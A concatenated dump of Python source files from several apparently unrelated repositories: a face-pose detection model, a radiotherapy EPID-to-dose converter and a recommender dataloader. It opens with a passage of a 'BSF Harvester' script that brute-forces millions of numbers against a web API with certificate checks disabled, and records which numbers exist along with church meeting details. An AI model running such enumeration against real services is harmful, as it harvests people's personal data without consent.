"X-Requested-With":"XMLHttpRequest"
}
def init():
print "Initializing BSF Harvester..."
def createNewDumpDir():
os.mkdir(PATH_DUMP)
def backupDumpDir():
timestamp = str(datetime.now())
bk_dir = PATH_DUMP_BK_FORMAT(timestamp)
os.rename(PATH_DUMP,bk_dir)
print "Moved {} to {}!".format(PATH_DUMP,bk_dir)
def dumpDirExist():
return os.path.exists(PATH_DUMP)
if dumpDirExist():
print "{} directory already exist".format(PATH_DUMP)
backupDumpDir()
print "Creating new {} directory".format(PATH_DUMP)
createNewDumpDir()
def harvest():
def appendNumber(fn,number):
f = open(fn, "a")
f.write("{}\n".format(number))
def writeDumpFileHeaders(dump_fn,data):
timestamp = str(datetime.now())
classDesc = data["classDesc"]
classNumber = data["classNumber"]
className = data["className"]
meetingChurch = data["meetingChurch"]
meetingTime = data["meetingTime"]
meetingDay = data["meetingDay"]
meetingChurchAddress = data["meetingChurchAddress"]
f = open(dump_fn, "w+")
f.write(FILE_DUMP_HEADERS_FORMAT(timestamp,
classNumber,
className,
classDesc,
meetingChurch,
meetingChurchAddress,
meetingDay,
meetingTime))
f.close()
def getSSLcontextTrustAllStrategy():
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return ctx
def generateNumber(base_num,x):
return FRIST_NUMBER[base_num]*10000000 + x
def get(number):
req = urllib2.Request(HTTP_URL_FORMAT(number),headers=HTTP_HEADERS)
try:
response = urllib2.urlopen(req,context=getSSLcontextTrustAllStrategy())
except urllib2.HTTPError as e:
if e.code == 500:
time.sleep(DEFAULT_GET_DELAY_SECONDS)
print "Retrying {}..".format(number)
return get(number)
else:
return json.loads(response.read())
for base_num in range(2):
for x in range(0,9999999):
number = generateNumber(base_num,x)
print "Trying {}".format(number)
data = get(number)
if len(data) == 0:
print "NUMBER NOT IN DATABASE...\n"
continue
print "SUCCESS!! NUMBER FOUND - {} :)".format(number)
data = data[0]
classNumber = data["classNumber"]
meetingChurch = data["meetingChurch"].replace(" ", "-")
dump_fn = FILE_DUMP_PATH_FORMAT(classNumber, meetingChurch)
if not os.path.isfile(dump_fn):
writeDumpFileHeaders(dump_fn,data)
appendNumber(dump_fn,str(number))
print "Program finished :)"
return
def main():
init()
harvest()
if __name__ == '__main__':
main()
``` |
{
"source": "jiacheng1gujiaxin/poseface",
"score": 2
} |
#### File: poseface/img2pose/model_loader.py
```python
from os import path
import torch
try:
from utils.dist import is_main_process
except Exception as e:
print(e)
def save_model(fpn_model, optimizer, config, val_loss=0, step=0, model_only=False):
if is_main_process():
save_path = config.model_path
if model_only:
torch.save(
{"fpn_model": fpn_model.state_dict()},
path.join(save_path, f"model_val_loss_{val_loss:.4f}_step_{step}.pth"),
)
else:
torch.save(
{
"fpn_model": fpn_model.state_dict(),
"optimizer": optimizer.state_dict(),
},
path.join(save_path, f"model_val_loss_{val_loss:.4f}_step_{step}.pth"),
)
def load_model(fpn_model, model_path, model_only=True, optimizer=None, cpu_mode=False):
if cpu_mode:
checkpoint = torch.load(model_path, map_location="cpu")
else:
checkpoint = torch.load(model_path)
fpn_model.load_state_dict(checkpoint["fpn_model"])
if not model_only:
optimizer.load_state_dict(checkpoint["optimizer"])
```
#### File: poseface/img2pose/models.py
```python
from typing import Dict, List, Optional, Tuple
import torch
import torch.nn.functional as F
import torchvision.models.detection._utils as det_utils
from torch import nn
from torchvision.models.detection.faster_rcnn import TwoMLPHead
from torchvision.models.detection.roi_heads import RoIHeads
from torchvision.models.detection.transform import GeneralizedRCNNTransform
from torchvision.ops import MultiScaleRoIAlign
from torchvision.ops import boxes as box_ops
from .generalized_rcnn import GeneralizedRCNN
from .losses import fastrcnn_loss
from .rpn import AnchorGenerator, RegionProposalNetwork, RPNHead
from .utils.pose_operations import transform_pose_global_project_bbox
class FastRCNNDoFPredictor(nn.Module):
"""
Standard classification + bounding box regression layers
for Fast R-CNN.
Arguments:
in_channels (int): number of input channels
num_classes (int): number of output classes (including background)
"""
def __init__(self, in_channels, num_classes):
super(FastRCNNDoFPredictor, self).__init__()
hidden_layer = 256
self.dof_pred = nn.Sequential(
nn.Linear(in_channels, hidden_layer),
nn.BatchNorm1d(hidden_layer),
nn.ReLU(),
nn.Linear(hidden_layer, num_classes * 6),
)
def forward(self, x):
if x.dim() == 4:
assert list(x.shape[2:]) == [1, 1]
x = x.flatten(start_dim=1)
dof = self.dof_pred(x)
return dof
class FastRCNNClassPredictor(nn.Module):
"""
Standard classification + bounding box regression layers
for Fast R-CNN.
Arguments:
in_channels (int): number of input channels
num_classes (int): number of output classes (including background)
"""
def __init__(self, in_channels, num_classes):
super(FastRCNNClassPredictor, self).__init__()
self.cls_score = nn.Linear(in_channels, num_classes)
def forward(self, x):
if x.dim() == 4:
assert list(x.shape[2:]) == [1, 1]
x = x.flatten(start_dim=1)
scores = self.cls_score(x)
return scores
class FasterDoFRCNN(GeneralizedRCNN):
def __init__(
self,
backbone,
num_classes=None,
# transform parameters
min_size=800,
max_size=1333,
image_mean=None,
image_std=None,
# RPN parameters
rpn_anchor_generator=None,
rpn_head=None,
rpn_pre_nms_top_n_train=6000,
rpn_pre_nms_top_n_test=6000,
rpn_post_nms_top_n_train=2000,
rpn_post_nms_top_n_test=1000,
rpn_nms_thresh=0.4,
rpn_fg_iou_thresh=0.5,
rpn_bg_iou_thresh=0.3,
rpn_batch_size_per_image=256,
rpn_positive_fraction=0.5,
# Box parameters
box_roi_pool=None,
box_head=None,
box_predictor=None,
box_score_thresh=0.05,
box_nms_thresh=0.5,
box_detections_per_img=1000,
box_fg_iou_thresh=0.5,
box_bg_iou_thresh=0.5,
box_batch_size_per_image=512,
box_positive_fraction=0.25,
bbox_reg_weights=None,
pose_mean=None,
pose_stddev=None,
threed_68_points=None,
threed_5_points=None,
bbox_x_factor=1.1,
bbox_y_factor=1.1,
expand_forehead=0.3,
):
if not hasattr(backbone, "out_channels"):
raise ValueError(
"backbone should contain an attribute out_channels "
"specifying the number of output channels (assumed to be the "
"same for all the levels)"
)
assert isinstance(rpn_anchor_generator, (AnchorGenerator, type(None)))
assert isinstance(box_roi_pool, (MultiScaleRoIAlign, type(None)))
if num_classes is not None:
if box_predictor is not None:
raise ValueError(
"num_classes should be None when box_predictor is specified"
)
else:
if box_predictor is None:
raise ValueError(
"num_classes should not be None when box_predictor "
"is not specified"
)
out_channels = backbone.out_channels
if rpn_anchor_generator is None:
anchor_sizes = ((16,), (32,), (64,), (128,), (256,), (512,))
aspect_ratios = ((0.5, 1.0, 2.0),) * len(anchor_sizes)
rpn_anchor_generator = AnchorGenerator(anchor_sizes, aspect_ratios)
if rpn_head is None:
rpn_head = RPNHead(
out_channels, rpn_anchor_generator.num_anchors_per_location()[0]
)
rpn_pre_nms_top_n = {
"training": rpn_pre_nms_top_n_train,
"testing": rpn_pre_nms_top_n_test,
}
rpn_post_nms_top_n = {
"training": rpn_post_nms_top_n_train,
"testing": rpn_post_nms_top_n_test,
}
rpn = RegionProposalNetwork(
rpn_anchor_generator,
rpn_head,
rpn_fg_iou_thresh,
rpn_bg_iou_thresh,
rpn_batch_size_per_image,
rpn_positive_fraction,
rpn_pre_nms_top_n,
rpn_post_nms_top_n,
rpn_nms_thresh,
)
if box_roi_pool is None:
box_roi_pool = MultiScaleRoIAlign(
featmap_names=["0", "1", "2", "3"], output_size=7, sampling_ratio=2
)
if box_head is None:
resolution = box_roi_pool.output_size[0]
representation_size = 1024
box_head = TwoMLPHead(out_channels * resolution ** 2, representation_size)
if box_predictor is None:
representation_size = 1024
box_predictor = FastRCNNDoFPredictor(representation_size, num_classes)
roi_heads = DOFRoIHeads(
# Box
box_roi_pool,
box_head,
box_predictor,
box_fg_iou_thresh,
box_bg_iou_thresh,
box_batch_size_per_image,
box_positive_fraction,
bbox_reg_weights,
box_score_thresh,
box_nms_thresh,
box_detections_per_img,
out_channels,
pose_mean=pose_mean,
pose_stddev=pose_stddev,
threed_68_points=threed_68_points,
threed_5_points=threed_5_points,
bbox_x_factor=bbox_x_factor,
bbox_y_factor=bbox_y_factor,
expand_forehead=expand_forehead,
)
if image_mean is None:
image_mean = [0.485, 0.456, 0.406]
if image_std is None:
image_std = [0.229, 0.224, 0.225]
transform = GeneralizedRCNNTransform(min_size, max_size, image_mean, image_std)
super(FasterDoFRCNN, self).__init__(backbone, rpn, roi_heads, transform)
def set_max_min_size(self, max_size, min_size):
self.min_size = (min_size,)
self.max_size = max_size
self.transform.min_size = self.min_size
self.transform.max_size = self.max_size
class DOFRoIHeads(RoIHeads):
def __init__(
self,
box_roi_pool,
box_head,
box_predictor,
# Faster R-CNN training
fg_iou_thresh,
bg_iou_thresh,
batch_size_per_image,
positive_fraction,
bbox_reg_weights,
# Faster R-CNN inference
score_thresh,
nms_thresh,
detections_per_img,
out_channels,
# Mask
mask_roi_pool=None,
mask_head=None,
mask_predictor=None,
keypoint_roi_pool=None,
keypoint_head=None,
keypoint_predictor=None,
pose_mean=None,
pose_stddev=None,
threed_68_points=None,
threed_5_points=None,
bbox_x_factor=1.1,
bbox_y_factor=1.1,
expand_forehead=0.3,
):
super(RoIHeads, self).__init__()
self.box_similarity = box_ops.box_iou
# assign ground-truth boxes for each proposal
self.proposal_matcher = det_utils.Matcher(
fg_iou_thresh, bg_iou_thresh, allow_low_quality_matches=False
)
self.fg_bg_sampler = det_utils.BalancedPositiveNegativeSampler(
batch_size_per_image, positive_fraction
)
if bbox_reg_weights is None:
bbox_reg_weights = (10.0, 10.0, 5.0, 5.0)
self.box_coder = det_utils.BoxCoder(bbox_reg_weights)
self.box_roi_pool = box_roi_pool
self.box_head = box_head
self.box_predictor = box_predictor
num_classes = 2
self.class_roi_pool = MultiScaleRoIAlign(
featmap_names=["0", "1", "2", "3"], output_size=7, sampling_ratio=2
)
resolution = box_roi_pool.output_size[0]
representation_size = 1024
self.class_head = TwoMLPHead(
out_channels * resolution ** 2, representation_size
)
self.class_predictor = FastRCNNClassPredictor(representation_size, num_classes)
self.score_thresh = score_thresh
self.nms_thresh = nms_thresh
self.detections_per_img = detections_per_img
self.mask_roi_pool = mask_roi_pool
self.mask_head = mask_head
self.mask_predictor = mask_predictor
self.keypoint_roi_pool = keypoint_roi_pool
self.keypoint_head = keypoint_head
self.keypoint_predictor = keypoint_predictor
self.pose_mean = pose_mean
self.pose_stddev = pose_stddev
self.threed_68_points = threed_68_points
self.threed_5_points = threed_5_points
self.bbox_x_factor = bbox_x_factor
self.bbox_y_factor = bbox_y_factor
self.expand_forehead = expand_forehead
def select_training_samples(
self,
proposals, # type: List[Tensor]
targets, # type: Optional[List[Dict[str, Tensor]]]
):
# type: (...) -> Tuple[List[Tensor], List[Tensor], List[Tensor], List[Tensor]]
self.check_targets(targets)
assert targets is not None
dtype = proposals[0].dtype
device = proposals[0].device
gt_boxes = [t["boxes"].to(dtype) for t in targets]
gt_labels = [t["labels"] for t in targets]
gt_dofs = [t["dofs"] for t in targets]
# append ground-truth bboxes to propos
proposals = self.add_gt_proposals(proposals, gt_boxes)
# get matching gt indices for each proposal
matched_idxs, labels = self.assign_targets_to_proposals(
proposals, gt_boxes, gt_labels
)
# sample a fixed proportion of positive-negative proposals
sampled_inds = self.subsample(labels)
matched_gt_boxes = []
matched_gt_dofs = []
num_images = len(proposals)
for img_id in range(num_images):
img_sampled_inds = sampled_inds[img_id]
proposals[img_id] = proposals[img_id][img_sampled_inds]
labels[img_id] = labels[img_id][img_sampled_inds]
matched_idxs[img_id] = matched_idxs[img_id][img_sampled_inds]
gt_boxes_in_image = gt_boxes[img_id]
gt_dofs_in_image = gt_dofs[img_id]
if gt_boxes_in_image.numel() == 0:
gt_boxes_in_image = torch.zeros((1, 4), dtype=dtype, device=device)
if gt_dofs_in_image.numel() == 0:
gt_dofs_in_image = torch.zeros((1, 4), dtype=dtype, device=device)
matched_gt_boxes.append(gt_boxes_in_image[matched_idxs[img_id]])
matched_gt_dofs.append(gt_dofs_in_image[matched_idxs[img_id]])
# regression_targets = self.box_coder.encode(matched_gt_boxes, proposals)
dof_regression_targets = matched_gt_dofs
box_regression_targets = matched_gt_boxes
return (
proposals,
matched_idxs,
labels,
dof_regression_targets,
box_regression_targets,
)
def decode(self, rel_codes, boxes):
# type: (Tensor, List[Tensor]) -> Tensor
assert isinstance(boxes, (list, tuple))
assert isinstance(rel_codes, torch.Tensor)
boxes_per_image = [b.size(0) for b in boxes]
concat_boxes = torch.cat(boxes, dim=0)
box_sum = 0
for val in boxes_per_image:
box_sum += val
pred_boxes = self.decode_single(rel_codes.reshape(box_sum, -1), concat_boxes)
return pred_boxes.reshape(box_sum, -1, 6)
def postprocess_detections(
self,
class_logits, # type: Tensor
dof_regression, # type: Tensor
proposals, # type: List[Tensor]
image_shapes, # type: List[Tuple[int, int]]
):
# type: (...) -> Tuple[List[Tensor], List[Tensor], List[Tensor]]
device = class_logits.device
num_classes = class_logits.shape[-1]
boxes_per_image = [boxes_in_image.shape[0] for boxes_in_image in proposals]
pred_boxes = torch.cat(proposals, dim=0)
N = dof_regression.shape[0]
pred_boxes = pred_boxes.reshape(N, -1, 4)
pred_dofs = dof_regression.reshape(N, -1, 6)
pred_scores = F.softmax(class_logits, -1)
pred_boxes_list = pred_boxes.split(boxes_per_image, 0)
pred_scores_list = pred_scores.split(boxes_per_image, 0)
pred_dofs_list = pred_dofs.split(boxes_per_image, 0)
all_boxes = []
all_scores = []
all_labels = []
all_dofs = []
for boxes, dofs, scores, image_shape in zip(
pred_boxes_list, pred_dofs_list, pred_scores_list, image_shapes
):
boxes = box_ops.clip_boxes_to_image(boxes, image_shape)
# create labels for each prediction
labels = torch.arange(num_classes, device=device)
labels = labels.view(1, -1).expand_as(scores)
# remove predictions with the background label
dofs = dofs[:, 1:]
scores = scores[:, 1:]
labels = labels[:, 1:]
# batch everything, by making every class prediction be a separate instance
boxes = boxes.reshape(-1, 4)
dofs = dofs.reshape(-1, 6)
scores = scores.reshape(-1)
labels = labels.reshape(-1)
# remove low scoring boxes
inds = torch.nonzero(scores > self.score_thresh).squeeze(1)
boxes, dofs, scores, labels = (
boxes[inds],
dofs[inds],
scores[inds],
labels[inds],
)
# remove empty boxes
keep = box_ops.remove_small_boxes(boxes, min_size=1e-2)
boxes, dofs, scores, labels = (
boxes[keep],
dofs[keep],
scores[keep],
labels[keep],
)
# create boxes from the predicted poses
boxes, dofs = transform_pose_global_project_bbox(
boxes,
dofs,
self.pose_mean,
self.pose_stddev,
image_shape,
self.threed_68_points,
bbox_x_factor=self.bbox_x_factor,
bbox_y_factor=self.bbox_y_factor,
expand_forehead=self.expand_forehead,
)
# non-maximum suppression, independently done per class
keep = box_ops.batched_nms(boxes, scores, labels, self.nms_thresh)
boxes, dofs, scores, labels = (
boxes[keep],
dofs[keep],
scores[keep],
labels[keep],
)
# keep only topk scoring predictions
keep = keep[: self.detections_per_img]
all_boxes.append(boxes)
all_scores.append(scores)
all_labels.append(labels)
all_dofs.append(dofs)
return all_boxes, all_dofs, all_scores, all_labels
def forward(
self,
features, # type: Dict[str, Tensor]
proposals, # type: List[Tensor]
image_shapes, # type: List[Tuple[int, int]]
targets=None, # type: Optional[List[Dict[str, Tensor]]]
):
# type: (...) -> Tuple[List[Dict[str, Tensor]], Dict[str, Tensor]]
"""
Arguments:
features (List[Tensor])
proposals (List[Tensor[N, 4]])
image_shapes (List[Tuple[H, W]])
targets (List[Dict])
"""
if targets is not None:
for t in targets:
floating_point_types = (torch.float, torch.double, torch.half)
assert (
t["boxes"].dtype in floating_point_types
), "target boxes must of float type"
assert (
t["labels"].dtype == torch.int64
), "target labels must of int64 type"
if self.training or targets is not None:
(
proposals,
matched_idxs,
labels,
regression_targets,
regression_targets_box,
) = self.select_training_samples(proposals, targets)
else:
labels = None
regression_targets = None
matched_idxs = None
if self.training or targets is not None:
num_images = len(proposals)
dof_proposals = []
dof_regression_targets = []
box_regression_targets = []
dof_labels = []
pos_matched_idxs = []
for img_id in range(num_images):
pos = torch.nonzero(labels[img_id] > 0).squeeze(1)
dof_proposals.append(proposals[img_id][pos])
dof_regression_targets.append(regression_targets[img_id][pos])
box_regression_targets.append(regression_targets_box[img_id][pos])
dof_labels.append(labels[img_id][pos])
pos_matched_idxs.append(matched_idxs[img_id][pos])
box_features = self.box_roi_pool(features, dof_proposals, image_shapes)
box_features = self.box_head(box_features)
dof_regression = self.box_predictor(box_features)
class_features = self.class_roi_pool(features, proposals, image_shapes)
class_features = self.class_head(class_features)
class_logits = self.class_predictor(class_features)
result = torch.jit.annotate(List[Dict[str, torch.Tensor]], [])
else:
num_images = len(proposals)
box_features = self.box_roi_pool(features, proposals, image_shapes)
box_features = self.box_head(box_features)
dof_regression = self.box_predictor(box_features)
class_features = self.class_roi_pool(features, proposals, image_shapes)
class_features = self.class_head(class_features)
class_logits = self.class_predictor(class_features)
result = torch.jit.annotate(List[Dict[str, torch.Tensor]], [])
losses = {}
if self.training or targets is not None:
assert labels is not None and regression_targets is not None
# assert matched_idxs is not None
loss_classifier, loss_dof_reg, loss_points = fastrcnn_loss(
class_logits,
labels,
dof_regression,
dof_labels,
dof_regression_targets,
box_regression_targets,
dof_proposals,
image_shapes,
self.pose_mean,
self.pose_stddev,
self.threed_5_points,
)
losses = {
"loss_classifier": loss_classifier,
"loss_dof_reg": loss_dof_reg,
"loss_points": loss_points,
}
else:
boxes, dofs, scores, labels = self.postprocess_detections(
class_logits, dof_regression, proposals, image_shapes
)
num_images = len(boxes)
for i in range(num_images):
result.append(
{
"boxes": boxes[i],
"labels": labels[i],
"scores": scores[i],
"dofs": dofs[i],
}
)
return result, losses
``` |
{
"source": "Jiachengciel/The-conversion-of-radiotherapy-image-by-machine-learning",
"score": 2
} |
#### File: The-conversion-of-radiotherapy-image-by-machine-learning/Final-Code/Conversion en dose.py
```python
import time
import os
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
# =====Pour Neural Network====
import torch
import torch.nn as nn
from torch.autograd import Variable
# =====Pour Random Forest=====
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
from sklearn.externals import joblib
# =================Parameters===========================
# =====Pour Neural Network=======
PATH_PARAMETERS_IMRT = './IMRT/checkpoint_lr5e-05_Epoch80_lambda0.0001.pth.tar'
PATH_PARAMETERS_VMAT= './VMAT/checkpoint_InNode9lr5e-05_Epoch80_lambda0.0001_VMAT_.pth.tar'
PATH_PARAMETERS_STATIC = './Static/checkpoint_lr5e-05_Epoch80_lambda0.0001.pth.tar'
# =====Pour Random Forest========
PATH_PARAMETERS_STATIC_RF = './RandomForest/RandomForest_static_1,3,5,6,7_depth_26_estimator_19_features_11.pkl'
PATH_PARAMETERS_EXACT_RF = './RandomForest/RandomForest_depth_26_estimator_19_features_11.pkl'
# ================ Basic function =======================
def normalization(arr):
"""normalize the array
Args:
arr: array
Return:
(array): normalization of the array
"""
return (arr - np.min(arr)) / (np.max(arr) - np.min(arr))
def standarization(arr):
"""standardize the array
Args:
arr: array
Return:
(array): standard of the array
"""
return (arr - np.mean(arr)) / np.std(arr)
def colorbar(image):
"""draw the colorbar of an image
Args:
image: image array
Returns:
color bar
"""
ax = image.axes
fig = ax.figure
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
return fig.colorbar(image, cax=cax)
def getPixelSize(Path):
_, pixel_size = read_information(Path)
return pixel_size
def getMaxvalue(image):
return np.max(image)
def getMinvalue(image):
return np.min(image)
# =============== Generate the image ==================
def read_information(Path):
"""Read the information of the image
Args:
Path : the path of the image
Returns:
ImPred : matrix of the image
pixel_size : pixel size of the image, [0] is pixel size on x axis, [1] is pixel size on y axis
"""
file_in = open(Path, "r")
# define a little-endian int32 type
dt = np.dtype('<i4')
# get the number of the pixel of image
DataInt = np.fromfile(file_in, dtype=dt, count=2)
Nrows = DataInt[0]
Ncols = DataInt[1]
# get the width and height of the image
Size = np.fromfile(file_in, dtype='<f', count=4)
width = Size[2] - Size[0]
height = Size[3] - Size[1]
pixel_size_x = float(width / Ncols)
pixel_size_y = float(height / Nrows)
pixel_size = [pixel_size_x, pixel_size_y]
# Read all the intensity of the image
ImData = np.fromfile(file_in, dtype='<f')
file_in.close()
# Resize to an image
ImPred = np.reshape(ImData, (Ncols, Nrows))
return ImPred, pixel_size
def get_image(Path, isInput=True):
""" Read the information of the images
Args:
Path : the path of the image
isInput : whether it is the input of Neural Network
Returns:
ImPred : matrix of the image
pixel_size : pixel size of the image, [0] is pixel size on x axis, [1] is pixel size on y axis
Raises:
IOError: An error occurred if it can't read the file
"""
path = []
try:
for root, dirs, files in os.walk(Path):
for file in files:
path.append(os.path.join(root, file))
# simulation is Y(Output), acauired is X(Input)
if path[0].split('/')[-1].split('.')[0].split('_')[-1] == 'simulation':
path_X = path[1]
path_Y = path[0]
else:
path_X = path[0]
path_Y = path[1]
if isInput:
path = path_X
else:
path = path_Y
except IOError:
print("Error: Can't find the file!")
else:
ImPred, pixel_size = read_information(path)
return ImPred, pixel_size
# =====Pour Neural Network==========
def generate(Path, isNormalize=False):
"""Generate all the input variables -- (9 features)
Args:
Path : the path of the image input and output
isNormalize: Normalize the input data or not
Returns:
X: input of the Neural Network
Y_: the correct result of the input
"""
Img_X, _ = read_information(Path=Path)
# Padding the Img X
# minimum value in X like zero padding
minimum = np.min(Img_X)
Img_X = np.pad(Img_X, ((1, 1), (1, 1)), 'constant', constant_values=(minimum, minimum))
if isNormalize:
Data = normalization(Img_X)
else:
Data = Img_X
# Calculate the dimension of X and Y
Ncols = Data.shape[1] - 2
Nrows = Data.shape[0] - 2
n = Ncols * Nrows
m = 9
# Initialize input X
X = np.zeros((n, m), dtype=float)
# store the position, intensities
for i in range(n):
pos_i = int(i / Ncols + 1)
pos_j = int(i % Ncols + 1)
X[i][0] = Data[pos_i][pos_j] # X(i,j)
X[i][1] = Data[pos_i - 1][pos_j - 1] # X(i-1,j-1)
X[i][2] = Data[pos_i - 1][pos_j] # X(i-1,j)
X[i][3] = Data[pos_i - 1][pos_j + 1] # X(i-1,j+1)
X[i][4] = Data[pos_i][pos_j - 1] # X(i,j-1)
X[i][5] = Data[pos_i][pos_j + 1] # X(i,j+1)
X[i][6] = Data[pos_i + 1][pos_j - 1] # X(i+1,j-1)
X[i][7] = Data[pos_i + 1][pos_j] # X(i+1,j)
X[i][8] = Data[pos_i + 1][pos_j + 1] # X(i+1,j+1)
return X
# ======Pour Random Forest==============
def generate_RF(Path, isNormalize=False):
"""Generate all the input variables -- (18 features)
Args:
Path : the path of the image input and output
isNormalize: Normalize the input data or not
Returns:
X: input of Random Forest
"""
Img_X, _ = read_information(Path=Path)
# Padding the Img X
# minimum value in X like zero padding
minimum = np.min(Img_X)
Img_X = np.pad(Img_X, ((1, 1), (1, 1)), 'constant', constant_values=(minimum, minimum))
if isNormalize:
Data = normalization(Img_X)
else:
Data = Img_X
# Calculate the dimension of X and Y
Ncols = Data.shape[1] - 2
Nrows = Data.shape[0] - 2
n = Ncols * Nrows
m = 18
# Initialize input X
X = np.zeros((n, m), dtype=float)
# store the position, intensities
for i in range(n):
pos_i = int(i / Ncols + 1)
pos_j = int(i % Ncols + 1)
X[i][0] = Data[pos_i][pos_j] # X(i,j)
X[i][1] = Data[pos_i - 1][pos_j - 1] # X(i-1,j-1)
X[i][2] = Data[pos_i - 1][pos_j] # X(i-1,j)
X[i][3] = Data[pos_i - 1][pos_j + 1] # X(i-1,j+1)
X[i][4] = Data[pos_i][pos_j - 1] # X(i,j-1)
X[i][5] = Data[pos_i][pos_j + 1] # X(i,j+1)
X[i][6] = Data[pos_i + 1][pos_j - 1] # X(i+1,j-1)
X[i][7] = Data[pos_i + 1][pos_j] # X(i+1,j)
X[i][8] = Data[pos_i + 1][pos_j + 1] # X(i+1,j+1)
X[i][9] = X[i][0] ** 2 # X(i,j)
X[i][10] = X[i][1] ** 2 # X(i-1,j-1)
X[i][11] = X[i][2] ** 2 # X(i-1,j)
X[i][12] = X[i][3] ** 2 # X(i-1,j+1)
X[i][13] = X[i][4] ** 2 # X(i,j-1)
X[i][14] = X[i][5] ** 2 # X(i,j+1)
X[i][15] = X[i][6] ** 2 # X(i+1,j-1)
X[i][16] = X[i][7] ** 2 # X(i+1,j)
X[i][17] = X[i][8] ** 2
return X
# ===============================Neural Network=====================================================
# ========Parametres Basic==============
INPUT_NODE = 9
HIDDEN_LAYER1_NODE = 30
HIDDEN_LAYER2_NODE = 5
HIDDEN_LAYER3_NODE = 1
OUTPUT_NODE = 1
# =================Class of Neural Network==============
class Neural_Network(nn.Module):
def __init__(self, input_dim, hidden1_dim, hidden2_dim, hidden3_dim, output_dim):
super(Neural_Network, self).__init__()
self.ANN = nn.Sequential(
# 1
nn.Linear(input_dim, hidden1_dim),
nn.Tanh(),
# 2
nn.Linear(hidden1_dim, hidden2_dim),
nn.Tanh(),
# 3
nn.Linear(hidden2_dim, hidden3_dim),
nn.Sigmoid(),
)
# Linear function for increasing value: 1 --> 1
self.out = nn.Linear(hidden3_dim, output_dim)
def forward(self, X):
y = self.ANN(X)
# Increasing the value
out = self.out(y)
return out
# ================== Conversion by Neural Network =======================
def Conversion_ANN(X, isStatic=False, isVMAT=False):
"""Test for other image
Args:
X: input of the image
isStatic: is it the image static
isVMAT: is it the image VMAT
Returns:
prediction: the predict image dosimétrique of the input X
Raises:
Exception: can't find the model of Neural Network
"""
# Tensor Processing
X = torch.from_numpy(X)
# Model Basic
model = Neural_Network(INPUT_NODE, HIDDEN_LAYER1_NODE, HIDDEN_LAYER2_NODE, HIDDEN_LAYER3_NODE, OUTPUT_NODE)
# Check whether there is a model
if isStatic:
PATH_PARAMETERS = PATH_PARAMETERS_STATIC
elif isVMAT:
PATH_PARAMETERS = PATH_PARAMETERS_VMAT
else:
PATH_PARAMETERS = PATH_PARAMETERS_IMRT
IsExists = os.path.exists(PATH_PARAMETERS)
if IsExists:
print("Model exists, begin test!!!")
# Get the Parameters of Model
checkpoint = torch.load(PATH_PARAMETERS)
model.load_state_dict(checkpoint['model_state_dict'])
else:
print("No model, try to find it!!!")
return None
# Predict the Target
prediction = model(X.float())
return prediction.detach().numpy()
def get_results_ANN(path, isStatic=False, isVMAT=False):
"""Get all the result of the test
Args:
path: path of the image EPID
isStatic: conversion for image static (true or false)
isStatic: conversion for image VMAT (true or false)
Returns:
Accuracy: a text file storing the gamma index of all the test images
Comparision Image: the predict image, the gamma index immage and the origin image
Raises:
IOError: An error occurred if it can't read the file
"""
# Basic for Normalization of the test image
if isStatic:
Init_Array = np.load('/Static/Init.npz')
elif isVMAT:
Init_Array = np.load('./VMAT/Init_InNode9lr5e-05_Epoch80_lambda0.0001_VMAT_.npz')
else:
Init_Array = np.load('./IMRT/Init_lr5e-05_Epoch80_lambda0.0001_9_10_11_14_21_22_.npz')
ranges = Init_Array['Ranges']
minValues = Init_Array['MinValues']
X = generate(Path=path, isNormalize=False)
X = (X - minValues) / ranges
# Prediction with Model
Y_pre = Conversion_ANN(X, isStatic, isVMAT)
return Y_pre
# ================================================ Random Forest =======================================================
# =================Conversion by Random Forest===============
def Conversion_RF(X, isStatic=False):
"""Test for other image
Args:
X: input of the image
Returns:
y_pred: the predict image y of the input X
Raises:
Exception: can't find the model of Neural Network
"""
# Check whether there is a model
if isStatic:
PATH_PARAMETERS = PATH_PARAMETERS_STATIC_RF
else:
PATH_PARAMETERS = PATH_PARAMETERS_EXACT_RF
IsExists = os.path.exists(PATH_PARAMETERS)
if IsExists:
print("Model exists, begin test!!!")
# Get the Parameters of Model
clf = joblib.load(PATH_PARAMETERS)
else:
print("No model, try to find it!!!")
return None
# Predict the Target
prediction = clf.predict(X)
return prediction
def get_results_RF(path, isStatic=False):
"""Get all the result of the test
Args:
isStatic: test for image static or image exact (true or false)
Returns:
Accuracy: a text file storing the gamma index of all the test images
Comparision Image: the predict image, the gamma index immage and the origin image
Raises:
IOError: An error occurred if it can't read the file
"""
# Get the information of images
X = generate_RF(path, isNormalize=False)
# Prediction with Model
Y_pre = Conversion_RF(X, isStatic)
return Y_pre
# ========================================== Main Function =============================================================
def main(Path_Image, isANN, Static, VMAT):
"""La conversion de l'image EPID en image dosimétrique
Args:
Path_Image: the path of the image EPID
isANN: Use the model of ANN or not (True or False)
Static: the image is static or not (True or False)
VMAT: the image is VAMT or not (True or False)
Returns:
Image_dose : image en dose
"""
X = read_information(Path_Image)[0]
if Static and VMAT:
print("VMAT can't be Static the same time!")
if isANN:
Y = get_results_ANN(Path_Image, isStatic=Static, isVMAT=VMAT)
else:
Y = get_results_RF(Path_Image, isStatic=Static)
Image_dose = np.reshape(Y, X.shape)
# ===== dessin =====
fig = plt.figure()
ax1 = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
ax1.set_title('Image EPID')
ax2.set_title('Image en dose')
ax1.axis('off')
ax2.axis('off')
img1 = ax1.imshow(X)
img2 = ax2.imshow(Image_dose)
colorbar(img1)
colorbar(img2)
plt.tight_layout()
plt.show()
return Image_dose
if __name__ == '__main__':
Path_Image_EPID = '/home/nfssrv/liu/Desktop/Machine_Learning/codes/Pytorch_Dose/Images/set_26/5_acquired.epi.content'
isANN = True
Static = False
VMAT = False
Image_dose = main(Path_Image_EPID, isANN, Static, VMAT)
``` |
{
"source": "JiachengLi1995/FastRec",
"score": 2
} |
#### File: src/dataloaders/__init__.py
```python
from src.datasets import dataset_factory
from .sasrec import SASRecDataloader
DATALOADERS = {
SASRecDataloader.code(): SASRecDataloader,
}
def dataloader_factory(args, dataset):
dataloader = DATALOADERS[args.dataloader_code]
dataloader = dataloader(args, dataset)
train, val, test = dataloader.get_pytorch_dataloaders()
return train, val, test, dataset
```
#### File: src/datasets/__init__.py
```python
from .interaction import ItemDataset
DATASETS = {
